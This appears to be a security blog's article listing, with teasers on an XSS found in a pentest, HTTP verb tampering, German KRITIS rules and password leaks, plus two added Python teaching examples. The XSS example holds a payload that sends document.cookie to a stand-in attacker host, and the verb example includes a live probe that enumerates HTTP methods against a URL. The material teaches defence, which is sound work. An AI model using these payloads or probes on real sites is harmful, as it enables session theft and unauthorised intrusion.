Recently, we discovered a cross-site scripting vulnerability during a penetration test which was only possible because of a third-party plugin. What was surprising: the vulnerability seemed to occur only when the website was set to a specific language. So we took a closer look.
HTTP Verb Tampering
When testing web applications for security flaws, the application's handling of different HTTP request methods (also known as verbs) should be considered. Usually, interactions between clients and servers use the HTTP methods GET or POST to access resources.
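The following is an added example (not code from the article or its authors) of what such a verb check looks like in practice. It assumes a constructed server whose admin area is protected by an access-control rule that lists only GET and POST (the pattern behind Apache's `<Limit GET POST>`), puts a hardened handler next to it, and probes both with a list of verbs, including a made-up one, to see which slip past the rule. `probe_live` is the same probe against a real URL using only the standard library; the paths, verbs and status codes are assumptions for illustration.

```python
"""Added example (not from the original article): HTTP verb tampering.

A constructed stand-in for a server whose admin area is protected by an
access-control rule that only lists GET and POST, next to a hardened
variant, and a probe that enumerates other verbs to find the ones that
slip past the rule.
"""
import urllib.error
import urllib.request
from http import HTTPStatus

# Verbs worth trying: the standard set plus a made-up one, because a server
# that forwards unknown methods to the default handler is the classic case.
VERBS = ["GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "PATCH", "TRACE", "FOOBAR"]

PROTECTED_METHODS = {"GET", "POST"}  # what the misconfigured rule covers


def handle_request(method: str, path: str, authenticated: bool) -> int:
    """Misconfigured server: auth is enforced only for the listed methods."""
    if path.startswith("/admin") and not authenticated:
        if method in PROTECTED_METHODS:
            return HTTPStatus.UNAUTHORIZED
    # Any other method is treated like a GET by the application, so the
    # access-control check above is simply never reached.
    return HTTPStatus.OK


def handle_request_fixed(method: str, path: str, authenticated: bool) -> int:
    """Hardened server: authorise the path regardless of method first,
    then reject methods the route does not implement."""
    if path.startswith("/admin") and not authenticated:
        return HTTPStatus.UNAUTHORIZED
    if method not in ("GET", "POST"):
        return HTTPStatus.METHOD_NOT_ALLOWED
    return HTTPStatus.OK


def probe_verbs(handler, path: str, verbs=VERBS) -> dict:
    """Send every verb unauthenticated; map verb -> status code."""
    return {verb: int(handler(verb, path, False)) for verb in verbs}


def bypassing_verbs(handler, path: str, verbs=VERBS) -> list:
    """Verbs that get a 2xx where an unauthenticated GET is refused."""
    baseline = int(handler("GET", path, False))
    if baseline < 400:
        return []  # GET is open anyway; there is nothing to bypass
    results = probe_verbs(handler, path, verbs)
    return [verb for verb, code in results.items() if 200 <= code < 300]


def probe_live(url: str, verbs=VERBS, timeout: float = 5.0) -> dict:
    """The same probe against a real endpoint (only against targets you are
    authorised to test). Returns verb -> status code, or None if unreachable."""
    results = {}
    for verb in verbs:
        req = urllib.request.Request(url, method=verb)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                results[verb] = resp.status
        except urllib.error.HTTPError as err:
            results[verb] = err.code  # 401/403/405 etc. are the interesting part
        except urllib.error.URLError:
            results[verb] = None
    return results


if __name__ == "__main__":
    for name, handler in (("misconfigured", handle_request), ("fixed", handle_request_fixed)):
        print(name, probe_verbs(handler, "/admin/users"))
        print("  bypass via:", bypassing_verbs(handler, "/admin/users"))
```

Note the two separate fixes in the hardened handler: the authorisation decision must not depend on the method at all, and methods a route does not implement should be refused with 405 rather than silently handled like GET. Compare the status codes per verb, not just "is it 200": a 405 for PUT on a route that answers 401 to GET is the expected, safe outcome.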
Cross Site Scripting
At a high level, cross-site scripting (XSS for short) can be described as the embedding of foreign code into a trusted context, where it is then executed.
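As an added illustration (not code from the article), the following shows that definition in a constructed page template: user input is written straight into the HTML, so the browser cannot tell the attacker's markup from the page's own and runs it within the trusted origin. Beside it is the escaped form, plus the attribute context to show that escaping alone only works when the attribute value is quoted. The template, the payload and the helper names are assumptions for illustration.

```python
"""Added example (not from the original article): reflected XSS in one
rendering function, and the context-aware escaping that closes it.

The page template and the payload are constructed for illustration.
"""
import html

# Constructed attacker input, as it might arrive in a query parameter.
PAYLOAD = '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>'


def render_vulnerable(name: str) -> str:
    """Interpolates user input straight into the HTML body: the foreign
    <script> becomes part of the trusted page and executes."""
    return f"<p>Hello {name}</p>"


def render_escaped(name: str) -> str:
    """Escapes for the HTML body context: <, >, &, ' and " become entities,
    so the input is displayed as text instead of parsed as markup."""
    return f"<p>Hello {html.escape(name, quote=True)}</p>"


def render_attribute(name: str, quoted: bool = True) -> str:
    """Attribute context. Escaping is only sufficient if the attribute value
    is quoted: in an unquoted attribute a space ends the value, so a payload
    such as `x onmouseover=alert(1)` needs no special characters at all and
    html.escape() leaves it untouched."""
    safe = html.escape(name, quote=True)
    return f'<input value="{safe}">' if quoted else f"<input value={safe}>"


def reflects_unescaped(output: str, payload: str) -> bool:
    """Crude oracle for a test: does the raw payload survive into the
    response byte for byte?"""
    return payload in output


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_escaped(PAYLOAD))
    print(render_attribute("x onmouseover=alert(1)", quoted=False))
    print(render_attribute("x onmouseover=alert(1)", quoted=True))
```

The takeaway is that the escaping has to match the context the value lands in (HTML body, quoted attribute, URL, JavaScript string); one escaping routine applied everywhere, as in the unquoted attribute above, still leaves an exploitable sink.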
What is KRITIS and who does it affect?
In Germany, special regulations apply to operators of critical infrastructures under the Act on the Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, BSI), the BSI-Gesetz. But who counts as an operator, and when is an infrastructure classified as critical?
Password leaks and how to deal with them
At the beginning of April 2021, it became known that the personal data of more than 500 million Facebook users had surfaced on a hacking forum.